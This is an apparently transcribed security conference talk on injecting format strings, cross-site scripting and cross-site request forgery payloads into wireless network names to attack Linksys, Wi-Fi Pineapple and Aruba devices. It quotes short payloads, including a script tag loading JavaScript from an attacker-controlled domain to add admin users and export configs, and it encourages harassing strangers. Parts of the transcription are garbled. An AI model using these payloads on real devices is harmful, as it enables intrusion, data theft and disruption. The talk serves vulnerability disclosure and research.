Give me much leg room with this thing, do they? Well, I really hate standing behind podiums, but I guess that's what we'll go ahead and do. Today, my presentation is Practical Exploitation Using Malicious Server-Side Identifiers, or SSIDs. My name's Deral Heiland. I work as a senior security engineer for CDW Corporation, where I do consulting and pen testings for corporations and government agencies. I've been in IT for over 20 years. A number of you guys know me. I'm also part of the FUFASnet team. If you're familiar with tools like Medusa, FGDump, Preata, those are tools that come out of our group. So enough of that with me. Let's go ahead and move forward. Today's agenda, we're going to go over an introduction of what an SSID is. Pretty high level, just to get the point out there. And then we're going to get to examination of SSIDs as an injection vector. We're going to look at it from a little bit of a historical standpoint. We're going to look at it from how did I get to this point? How did I get started doing this? And then we're going to talk about leveraging SSIDs for injections. We have a couple live demos. Hopefully they all go well. It started off quite horrible earlier. We fired up all the equipment at lunchtime, and my wireless LAN controller would not even boot. So we fired it with that through the entire lunchtime and finally gave up and walked away. And about 30 minutes before this presentation started, my radio started broadcasting. So it looks like we may actually have some good live demos. If not, we'll switch over to some videos, which I prefer not to do. I did have my cell phone thing for displaying my cell phone fail, which is not unusual. It's a total piece of crap software anyway, so that doesn't surprise me. So then we're going to get into discussion of SSID's limitations during the attacks, probability of success and related limitations to that success. How common is this vulnerability? What next? Kind of look forward, future. Are there other things we want to look at? And then hopefully questions and answers at the end. I'm going to be here until probably Sunday morning, so if we run out of time and don't have time for questions, grab me after this. We can have a beer. We can shoot the bull. Please don't hesitate to come up and talk with me. So let's start off with an introduction to server-side identifiers. I apologize for that. Okay. Well, that first part was just boring anyways. Do we have slides now? Okay, real simple. What is an SSID? Well, the purpose of an SSID is to assign human-readable name to an 802.111 wireless network. So when we fire up a device we want to attach to a wireless network, we can identify the wireless network we want to attach to by something that we can understand. The SSID is broadcast in a management frame or beacon frame. It's made up of three key elements. The element ID, this is set to 0 to signal the SSID is actually going to be broadcast. The length setting is for indicating the length of the information field, and of course the SSID, the human readable part, it can be up to 32 bytes. So typically 32 characters under normal conditions. That's okay. So I can keep going as we're moving around. This is fairly simple. So the next thing we want to look at is the IEEE standards for the SSID and how that plays out. Well, it turns out there is no defined standard or limitations within the IEEE standards. So basically, you could put any character that you want within an SSID. The only limitations that I've come across are ones that are imposed by the vendor or manufacturer of the product. I've come across few that only allow you to enter things like just standard ASCII. And then, of course, you run into how a number of these devices may or may not handle Unicode, and certain vendors may prevent certain Unicode from actually being utilized on those devices. So it brings up another interesting topic. I don't know how many people have actually seen Adrian Crenshaw's presentation dealing with Unicode stuff or checked out the stuff that he's published on his site. He's also going to be speaking at HackerCon in Charleston, West Virginia here in a week or two. I'm not sure the exact date. We're here in a week or two, so check it out. And it's kind of interesting because with the Unicode, if you didn't notice, on Twitter, there was an actual Unicode string of characters, about 50 bytes of data, that was bouncing around that would crash the iOS for Apple systems. And it was just a string of Unicode. It turns out it was 50 characters, so it wouldn't fit in an SSID. So I crunched it around and chopped it up and found the section that was really doing the damage. And I retweeted that out there. And you can actually put that in an SSID, and it would actually crash the iOS functionality or the program for setting up your wireless on your like iPads and iPhones, so you can fire that up and the person could never select a wireless device to connect to, because every time he did it would just crash. So that's kind of another subject. So I'd go ahead and look at some of those tweets out there to get that piece, and also check out Adrian's presentation at HackerCon, or check out what he's published on his website, irongeek.com. So examination of SSID as an injector vector. A little bit of history. Obviously, anytime one of us does research, we want to be the first person to come up with that. So when I initially started playing with this and discovered this, I did some research, and of course I found somebody who had actually documented this in the past. And this is Rafael Dominicus Vega of MWR Info Security. He released a white paper called Behind Enemy Lines in July 2008. The white paper covered a number of injection topics, but one of the sections that he did talk about was the possibility of using SSIDs, and the two examples that he did cover was the BT Home Hub and the DDWRT, where he injected cross-site scripting data in through the SSID, which of course we're going to talk about some more today. But over the last 5 or 6 years, there's been a number of products where there's been patches, vulnerabilities reported, and published information, specifically through the CVEs. So if you do a search on CVEs for SSIDs, you can find a number of these devices. So it's not unheard of, but my goal is kind of collaborate it all into like a white paper and a discussion, and that's why we're here. So initial discovery, so how did I get started? Well, this is kind of interesting. So last year I spoke on a presentation called Format String Vulnerabilities 101, and I submitted my talk to DerbyCon. And lo and behold, the day that I was playing around with a Linksys device, I get an email from the guys going, your talk's been accepted. So I'm sitting there setting up this Linksys device, and I go, what if? You know, it's that whole what if scenario. So what I did was I fired up Airbase NG, threw some format string specifiers in there, and bad things happened. And that's how this project got started. I figured, well, what else can I do through SSIDs? Some of the vulnerabilities that we've actually published on this is the 5 general devices here as part of the initial discovery. A couple Linksys devices, Cisco Linksys devices, a Sonic Wall, an Aruba wireless LAN controller, and of course the Wi-Fi Pineapple. So we're going to discuss a number of these here, and we're going to demo a couple of these devices today. So the first one we want to dig into is actually the format string injection vulnerabilities. Like I mentioned, I was playing around with the Cisco Linksys devices, which is a small, hold on. So basically it's a small business product that was produced by Linksys and Cisco bought them. So this is generally what the product looks like. That's a $100, $150 type item. And it turned out that when you mess around with the WPA 200 or the WET 200 of these devices, there's a function called site survey. The site survey, when you run it, will identify wireless devices within close proximity of you. Generally, these devices are set up for doing things like bridging, as an example, or extending wireless networks within a small business environment. So the whole idea is if you publish information through another AP and then identify it with the site survey function, things happen. So in the case here, we went ahead and we fired up airbase ng, and we put format string specifiers %x, %x, %x actually into the SSID using airbase ng. So when we broadcast that out there in a normal system, it should show up as %x, %x, %x. But on these particular devices, we actually came back with data off the process stack. So immediately at this point is like, well, what can we do with that? How far can we take this vulnerability? I wish I could say I took it all the way to code execution, but unfortunately I did not. But I did take it to the point where I got full control of 4 bytes off the stack so I could read and write arbitrary memory on the device. And this was really weird. The device was just totally funky in the way it functioned. Things I expected to happen would not happen. You know, I'd put in like 3% X's in a row or 4% X's in a row, and it would just crash the device. So then I'd put in, you know, 2% X's and a %G, and then a %C, and then a %S. You know, I started doing all this weird stuff. Spent the entire Christmas vacation kind of screwing around with this thing to see what I could actually do. And eventually got control of 4 bytes with a very weird string of format string specifiers. So as we see here, we're able to do %G, all the way with %F, %Cs, and %X's. And as you can see in the data that we got back and the SSID return, we got control of the 4 A's that were on our stack, generally giving us the ability to theoretically read and write arbitrary memory. This thing was also capable and was compiled, so %N did appear to work. That means I could crash the device quite effectively if I changed the last X to a %N or a %S by reading illegal memory addresses. But it turns out, if you look at this, it's really weird all the way around. It's not 100% reliable. I can point it to what I found out that I believed to be a valid address, and it would crash, and then I could point it at another address close by it, and it would not crash. It would return data. So it was acting very strange. And also, if you see, look at the actual, if you see, oh gosh, let me see if I can come over here. So if you look right here at the channel, it shows up as -1. That's all corrupted based on the actual weird strings you put in. So I had one set of strings that gave me an A as the channel. One of them gave me, you know, like 5. Received all kinds of weird data based on that. So we were basically corrupting quite a bit of information in this process to get this thing to actual work. So moving from there, I mean, what can we do with this? I reported this to Cisco. They went ahead and they patched it. It was vulnerable in their whole series of 200,000 small business products, which was 4 or 6 items, I can't remember. So for my next step type thing, I would definitely love to be able to try to get code execution on this. But I could not identify JTAG or serial connections internal to this. So if anyone here is a really good hardware hacker and want to play around and work with this, and you can show that you're just not going to take and brick the freaking device and want to play around with it to get dumps off of it, I'll go ahead and let you have one. I would gladly do that. You can play around with it and let me know if we can actually start getting dumps, and then we can play around with it and see if we can actually get code execution. Why would we want to get a code execution? Because we can. It's the fun part. So let's move on from there. So the device is also vulnerable to cross-site scripting injection vulnerabilities. And this is simple. Anytime you want to test for cross-site scripting injection, what do? You put in script tags to pop an alert box. Quite simple, very straightforward. And you get various responses from different devices. So when we start off on the first one we looked at was the WPA 200, the WAP 200, and put this in thing, we instantly popped the phone box saying, hey, this thing's vulnerable. Fairly straightforward, fairly simple. But when we tried this against the WET 200, it actually crashed or clobbered the web page. So when we started examining this, we found out that our script data, let me see, where's it at? So the mouse is working, you can see it. Our script data is ended up in the middle of another script. So basically it was capturing the end of it, clobbering that existing script on the device. So if we wanted to carry out an attack on this device, probably the most appropriate way is to actually use 2 access points and broadcast the attack vector in 2 pieces. And that way or multiple APs, and that way you could structure the entire injection attack so that you don't clobber the page, but you get some kind of functionality that you're actually trying to get from the device itself. And that's what I did with the WET 200. But some of the issues I ran into is this is all dependent of order. So when I do the site survey, what order is my device actually going to show up? I was able to get some fairly decent success by setting one of my devices at a low order number like channel 1 and set the other one at a high order of number 11. And most of the time that actually worked in actually structuring it. They would fall in that order. And that was probably because both of them were close proximity to each other and the proximity to the actual device I was attacking. So in the real world, I'm not sure how this would play out with the WET 200. Mainly because I could not determine its exact order of display. So it seemed to be fairly random. The first one it saw when it did its search is the first one it displayed. Unlike a number of devices that I've experienced where it would base the order on several different things. One of them I've seen was the channel. I've seen them order things based on the channel number. I've also seen devices order them based on the BSSID, the MAC address on the device. So the lower MAC addresses were higher in the list, and the higher MAC addresses were lower, farther down in the list. And the other one was alphabetical order of the SSID. I've seen this variation on multiple devices. So if you were going to carry this attack out, you'd have to identify how it varies on that specific device before you build your attack. Also, when you're dealing with injection attacks, you know, you're not limited to just standard script tags. iframe's really good. You can do some cool stuff through that. Object, image tags, embed, and there are a number of different ways you can actually inject data into an environment. And we also have a number of limitations. So dealing with limitations within the SSID, real quick. Obviously, the biggest one we're dealing with is 32 characters. That is the max number of characters you can put in to the device. It's 32 characters. So to get full exploit, you're not going to be able to do it within that limit in a lot of cases. So you're going to have to call it from a third-party site called JavaScript or some kind of code from a third-party site. But then you run into another issue, and that's dealing with the actual URL. It eats up spaces. I mean, if you think about just an IP address of 10.10.10.10, we've eaten up actually 11 characters out of our 32 just with an IP address. And then we also got to deal with some crazy idiosyncrasies of various devices. As an example, attacking the Wi-Fi Pineapple, there's a certain page, when you go to attack that particular page, it doesn't allow spaces. So anything you put in the SSID can't contain spaces or it truncates the data. Also, it doesn't allow the, I call it a backslash, it doesn't allow the backslash. It'll actually error out and not process that based on that information. And of course, what we just described a minute ago, a device may require you having multiple SSIDs broadcast to be able to structure a valid attack. So we're dealing with a lot of different variations on devices that cause some strange restrictions. Some devices need setup functions. An example, the WEP and the WAP 200 and WET 200. Both of those you needed to run the site survey function. Other than that, they never displayed any wireless around their systems. Only those devices then. So you got to capture those devices when they're being set up to carry out a valid attack against those. Also, devices that have rogue AP or IDS functionality would have to be enabled for any kind of attack to work against those functionalities. And then, of course, you got to deal with all of the standard issues around the web browser of the person that you're attacking their device through. A lot of browsers will restrict certain cross-site scripting, but if you're a hardened hacker, you can always find methods around those type of settings and functions to get your code to actually execute on those devices. So defeating some of the limitations during an actual attack. As I mentioned, when you're dealing with the 32 characters, how do you defeat these? Especially when you got to reference a URL to JavaScript to another site. Well, the method I used to actually carry this attack out was to register a domain that is short. In this case, I registered ld1.us, 6 characters. If you're trying to point to an IP address of 1.1.1.1, you're still going to eat up 7 characters. So I was able to at least save 1 character from the lowest order of IP address to actually have a site that I could actually launch attacks from. There's a number of 6-character domains still out there. If you're a pen tester, I would recommend registering a low order, a short domain name because it will have value for various injection attacks where you have limitations. And of course, they're opening up a lot of actual new domains lately, so you may be able to get a shorter one. I found out anything under 5 or under 6, it starts becoming a premium value of cost. And of course, if you're going to be launching attacks to devices that are configured or managed through SSL, you may actually register an SSL certificate for your site, because then you're going to run into issues with an attack against a site that's all SSL, the web browser prevented it from calling Java code that's non-SSL. And you see that in a lot of browsers also. In a case with the pineapple, so how do we defeat that? It turns out that we can replace the space with a backslash. But I told you you can't use a backslash, so you have to escape the backslash. So you can use a space, replace it with a backslash, escape the backslash, and you can get by those issues there. But of course, it's going to eat up more characters out of your 32 character limitations. And then when all else fails, a shout out to the guys that do beef. Great product. I found out that this whole thing integrated into my attack vectors really easy, and it made it really simple in a lot of cases with simple iframe calls that worked on almost every device I ever used it against to be able to hook with beef with little or no issues. So that's kind of cool. So a lot of thanks to them for that product there. And another, on a similar subject, Raphael Mudge's presentation, that is it Saturday? Saturday's presentation. Do not miss that presentation. I think what's going to be displayed there may be interested even within this attack vector to be able to proxy through the web server and pick up all the functions and features and rights of that user. Leverage again with this attack vector here may be pretty deadly. So I recommend checking out his presentation. I've seen the demo of what he's going to be talking about, and it's really, really damn cool. So the first one we want to get into is cross-site script injection, the Wi-Fi pineapple as an example. So in the Wi-Fi pineapples, how many people here have a Wi-Fi pineapples? We have a number of people in here. Okay. So it turns out the primary status page on the Wi-Fi pineapple is vulnerable to cross-site scripting attacks if you're doing versions below 2.7. I can't remember exactly what it is, but I know 2.7 forward, it's okay. The detailed report page is vulnerable to all current versions except the new rewrite, which I haven't tested, which I think is 3.0. I downloaded 3.0 and I felt like I blew my legs off. So it wasn't working for me at all, so I had to unload it. So I didn't really get to test all the features and functions of that full rewrite. So generally, if you're running the latest current stable version, it is actually vulnerable to cross-site scripting attacks within that environment. And of course, like I mentioned, with the attacking the detailed report page, you got to have no spaces, so you have to backslash it, and the backslashes have to be escaped with a /. And of course, the attack can be initiated from a smartphone, because that's basically how the device works. You know, it's waiting for someone trying to connect to an open AP, and then it says, yeah, that's me, connect to me. So if you go into a coffee shop and you see somebody playing around with one of these, hopefully you're going to get enough information today to like totally freaking screw with them. So it's real simple. So if we look up here on the status page, we can easily fire up a soft AP and use as an example, the image source, the ld1usa.jpg. Right now, ld1.us doesn't have that on the internet, but I will actually have several things published out there, so you could just use my ld1 and call certain images and stuff like that. And then the detail pages we see there, we've had to replace the spaces and escape all the backslashes for the functionality, but we still were able to do it within the 32 characters. And as you see on my phone there, I can just enter it as a network SSID and connect to it. And then instantly, you know, you can pop up a box on the script kiddie sitting in the coffee shop, says Big Brother's watching you, or something even worse if you want, and like totally screw with them. And I like totally screwing with people. That's always fun. And of course, don't forget, you can do image, iframes, objects, and script tags, and do all kinds of other stuff. So we do have a demo, and let's all pray to the demo gods, and let's see if this will actually work. Like I said, my phone is not working, or I can't display the phone, but I have my phone set up And I pray that none of you guys are going to take what I just showed you and start screwing with me. So let's go ahead and fire up the AP, and I don't want to keep it up too long. All these evil hackers just screw me up. So we fire this up. We fire up Karma, and I have stuff on my phone already. So we should start seeing some stuff show up. We see all kinds of stuff showing up. Okay, that's good. But I had put two settings on my phone, and the first one I want to attach to, if it shows up on my phone, is be able to do an image. So I go ahead and I select mine and I go connect, and it should show up here in a minute. It's connected. Okay. Let me go ahead and connected to somebody. If it didn't connect to me, it connected to somebody else. Let me see, where's it at? Okay, it connected here. So if we come over here and we look at this on the detail page, so the next one will take just a second, and we'll show it. And let me connect it real quick, and it'll take a second to time out. But most of the functions in here can only be done with post operations. But there was one function, and this comes in real handy if you're dealing with. Okay, I should be connected. Hopefully it'll come up. If you're actually dealing with a script kiddie, it turns out that under Wi-Fi WLAN PHP, there's a stop function. So you can sit there and just keep shutting off his wireless device. So let's see what happens if we go to general detail page. No, it ain't refreshed yet. Hold on. So give it a second. Patience. That's the problem with trying to do multiple attacks against this. And when we do against the Aruba, it's even freaking worse. So I'm connected to somebody. Let's see if that freshed out. I never have patience for this stuff when I'm standing in front of people. We're getting there. There it goes. Hold on. Learn how to drive a mouse. Okay. Let's go to general detail. Let me stop and restart it. Usually that flushes out there a little quicker, but in this environment with so many stuff being broadcast, and I don't know how many people I just hacked their phones and served them up IP addresses in the 5 minutes we were doing this. It says I'm connected. Well, let's see if that works. If this doesn't work, damn, I can't flush that out of there for nothing. So my phone's connected. For some reason, that won't flush out of there. So we're going to go ahead and move on. But typically, it's damn, that thing's noisy. So image source, just like we did before, Wi-Fi / WLAN.php / stop. Use that, and it will actually shut their Wi-Fi off. If they have not patched their system, you could do this against the primary status page, and they'll never know what the crap's happening to them, because it'll just keep turning it on. They'll fire it up and instantly shut it off. Fire it up and instantly shut it off, and it'll just keep doing that over and over and over. So let's go ahead and move on to the next part of this, and that's dealing with command injection. Unfortunately, I never got a fully functional command injection, but we had some stuff that was potential, and that's why I'm going to challenge you guys with an opportunity here. So generally, a command injection vulnerability is triggered in an unsanitized input, basically passing information to the operating system, execute shell commands at the device. We found one potentially in the Wi-Fi pineapple. And generally I think there's probably other products out there that actually have this same issue, but I haven't found any yet. So I expect there are some out there. But on the Wi-Fi Pineapple, remember the backslash? I told you couldn't use it. The reason why is the parsing routine. There's two things the parsing routine does. It parses the log file for the SSID name. So if you have spaces, it truncates on space name. So if you get rid of the space, it'll grab the entire SSID and move it over into an interactive parsing routine. Well, that parsing routine uses Ssid interactively. What happens when you have an extra slash in Ssid? And that right there is the actual error messages on the screen. Ssid, bad option in substitution expression. So it's basically just like you would type on a command line and put too many backslashes in Ssid, it throws that error, because that's where that error is coming from. So the perfect scenario would be able to reconstruct this so Ssid would actually execute code. I went out and I used every known method that I know for command injection, and I've done it many times, so I don't consider myself an idiot on the subject. And I wasn't successful. I went out and I looked at everyone else's methods, and I tried a bunch of those and was still not successful. So my challenge to you guys out there is, if somebody can actually get this working, remember, all you have to do is fire up an SSID with a backslash in it, and your Wi-Fi Pineapple is going to fail out with a Ssid command error on the screen. Take that and take it to command injection. I think it's doable. I just don't know why my methods aren't working. And if you do that, I'll buy you a beer. I'll buy you a case of beer. I'm nice. Because I'd like to see it working, and I don't like leaving things undone. So, and that's worth a case of beer to me. So moving on to the next subject, and that's cross-site request forgery. As an example, the Wi-Fi Pineapple. Matter of fact, here, just a second, while I step over here. That's probably not good to leave that running. So I'll hack my computer, screw up my entire presentation. So the next section is cross-site request forgery. An example on the Wi-Fi Pineapple, the demo section, it didn't work because it just wouldn't time out and flush its settings. With to be able to do WLAN stop is like a cross-site request forgery is what it is, because we're taking advantage of the fact that he's logged in as administrator on the device to execute code against that particular device. So with cross-site request forgery, we can do some really cool things. We can modify device settings. We can extract information. We have the same limitations at 32 characters. We can't go beyond 32 characters. So generally, we're going to have to call JavaScript from a third-party site in most cases to be able to get this to work effectively. So it turns out, and hopefully the demo gods are still good to us, the device is working if I can attach to it. So we're going to do a demo against an Aruba. So first, the Aruba 6. Does anyone use Aruba devices in here? There you go. We got one. We got two. We got a few people. Is it patched to the latest one? Probably not. I've never came across one that's been patched yet. So, oh yeah. Well, I surely hope you guys have it patched. Okay. Okay. So the Aruba guys are a bunch of good guys. It's kind of cool. Now they were nice enough and they were easy to work with, and you know they have a good sense of humor. They needed one. So it turns out that as I started this whole project, I hit my company up, CDW, and I said, "Hey, can you guys like send me some equipment? You think they could send me like a whole shitload of equipment?" But no, but they were able to send me some equipment. One of the devices they sent me was an Aruba survey kit. So I had the entire survey kit set at home. And I fired this device up and I launched the typical script tag, you know, alert message box, and it popped on the console. So I'm like, woo! Then you start thinking, what version am I at, and has it been patched yet? So I go out to the internet and I find out that the vulnerability's been reported and patched already. So I'm like, dang, this is no good. It was patched in 6.0.1.1. Wait a second, I'm running 6.1.2.3. Something ain't right here. So of course I don't believe what's installed in the system, so I went out and actually downloaded 6.1.3.6, which was the latest version on that day. And sure enough, it was still vulnerable. So I contact Aruba and I go, look guys, I know you patched this at 6011, but you know, 6123 is vulnerable and 6136 is vulnerable. So I get this somewhat sarcastic email back and it's like, yeah, right. You know, we fixed this already. We think you're just not doing something right. And I'm like, I retested it over and over just to make sure I wasn't screwing up. I go back and go, no, I think there's an issue here. You need to look at it. So they were quick. They got back to me in about 40 hours and they go, yeah, Deral, we screwed up and rolled out the issue in another patch. So they patched it and then turned around and rolled it back out sometime soon after that. I'm not sure. They wouldn't give me the actual date of when it got rolled out. But they rolled the vulnerability back out on the device. So with this attack, obviously you're able to carry out cross-site request forgeries against the device. Some cool things you're able to do: create new admin IDs on the device, change passwords, alter WPA pre-shared key, extract running configs on the device. Some cool stuff. So the two attacks we're going to attempt to do today is we're going to add a new user on the device. And then we're going to go ahead and have an FTP its running config to an FTP server I got setting back here. It's a separate box. The cool thing I found out also, generally on most of these devices, when you monitor the whole change process, it's a post. You're posting data, posting arguments. It turns out I could take all the post arguments and pass them right in the URL as a standard GET request, making cross-site request forgery all that much more easier on this particular device. And since this presentation is called Practical Exploitation, let's pray to gods. Come on. Hope this works. Ooh. We're going to go ahead and try to carry out an exploit. Now this all takes a minute. So I need to ask the Aruba guy, why does it always take like a minute or 2 minutes for the device to respond back to me when I'm trying to connect to the web interface? Is that what it is? Okay, so hopefully this will respond back to me in a minute. But let's while that's thinking about that for a second, let me try to find. This is the only thing I don't like about this system here is that it kind of like just bounces all of my stuff all over Hell's Half Acre. There it is. I put everything in a window, and then if my screen goes through a refresh, it just scatters them all over the place. I've yet to figure out why. Come on, try again. There we go. So far, so good. Come on. I was thinking about it. And we're kind of into the device. So if we come over here and we go to a couple things I want to show you real quick. If we come over here to configurations and down to, so I'm used to you doing this all on a table where I actually can use a mouse versus this creepy flat thing on the front of my keyboard. We can see there's one user here, admin. Everyone see that, admin? And its role is root on the device, fairly straightforward. And if we come over here to dashboard, security, oh wow, look at all the devices out there. So hopefully no one's ran out back there and started hacking me and going to screw up the presentation. But since my device is not actually, if my device was actually had a network interface onto the same network I'm working from, it would show up under rogue, and it would make it go a lot better. But we're going to monitor it under here, under total, which will show up pretty good. And let's see what happens. Come on. And it does it into the background for me. Thank you very much. Stupid piece of crap. Okay, so you can see, everyone can see that airbase ng script. We're going to call ld1.us.p.js. So apparently my device came disconnected on me. Demo gods do not like us. That's still plugged in right there? Of course, this is like a vicious atmosphere to be doing any of this stuff in, so who knows if that has anything to do with any of it. Oh gosh, why is it doing this? We got 7 minutes, don't we? Getting close to having to run the video, which totally sucks. Considering everything else worked, one device I didn't think would give me an issue decides to start playing with. Okay, I apologize. It'll probably start working right after this. So if we look here, can everyone see this fairly well? So we're going to go ahead. We have the Aruba device. I'm actually going to. What's that now? I don't know what you're talking about. Can you? Okay, just a second. Let's stop that. Hold on. I like that. That's a good guy. Good guy. Good guy. Okay. So you see the string there. Make sure you get it exactly the way it is. Okay, just a second. Hold on. Damn it. It's ld1.us. Hold on before you fire that up. See, make sure everything's working here before you fire it up, because this thing has a tendency to time out Aruba quite quickly sometimes. Okay, so you see the URL there, script source equals http://ld1.us/p.js. And of course, this thing's decided it wants to time out on me. Yeah, I know that. That's fine. Okay, it's working now. Okay, if you want to broadcast it out there. You got it going? Okay, you know. I just want to keep playing with this so it keeps working. Should be up. I don't see another device showing up yet. Yeah. Channel 7? Okay, well, looking for a device. It'll show up here in a minute. Yeah. Yeah, well, I ain't far from it. Okay, so that's not working either. Sure you're broadcasting that out there? So we're down to 5 minutes. Where do you see it at? Right there, that one there. Did you put the HTTP in there? No, I've done this 1,000 times. It works. Okay, looking at that right there, script space src https ://ld1.us/p. No, don't put the S in there. Yeah. Yeah, don't put the S in there. Okay. We're going to have to switch over to the video, guys. I'm sorry. You know it's going to start working as soon as we walk out of here. And I apologize to that because we want to... Okay. So as we speed through this thing, we can see we're going to look at the configuration. We're going to go a little faster than this thing. We'll look at the version. We're going to skip over this thing. We know there's a root on there. So if we monitor it, and the way I had it set up is, come on, go faster video. Come on, piece of crap. So kick it all off. Catch me after this presentation. I'll do it for you. It'll work fine. So instantly as we see, as it sees this, it throws us over to a black screen. The black screen happened to be 2 iframes. If we look over to the FTP server, we can see it offloaded the running config on the device. Okay, so it's fairly straightforward. It'll push that over there. Also on the device, it'll actually do... So if we come over maintenance, we can see that it shows up Evil Hacker. Generally, if anyone wants to see this afterwards, I'll fire it back up, and I'm sure it'll work fine in my room. You know how that works. Okay, so much for that. Let's kind of jump over here and move forward. I apologize for that. It was only a matter of time before the gods got up with me. So let's move quickly through this. Probability of success. Obviously, you need to be able to identify the devices you're going to target. You can do that through BSSIDs or default SSIDs and identify the devices. Devices that are site survey, it's probably not practical to actually exploit them unless you actually catch them during the actual configuration mode. Turns out targeting functions must be enabled. The Aruba IDS has to be enabled. It was enabled. Everything's functioning fine on the Aruba. Just that my device decided it didn't want to play out of the blue. I assume it has something to do with this environment because it was working 5 minutes ago before the presentation started because I validated it. So a large amount of targets that have not yet been tested. I can't look at everything. There's a lot of AP appliances out there that we need to actually look at. Other devices that may be interesting. What about wireless drivers, smartphones, third-party wireless applications, and how they may be attacked? You know, buffer overflows, format string injections, various things like that that may be able to be triggered through SSIDs. And as we finish up there right at the wire, again, sorry for the failure of this, and I still don't know why. I'm kind of pissed, but that's life. Here's my information. I think I'm probably out of time, so let's go ahead and probably catch me out on the floor with questions, or you want to throw shit at me for my failed presentation.
Too hard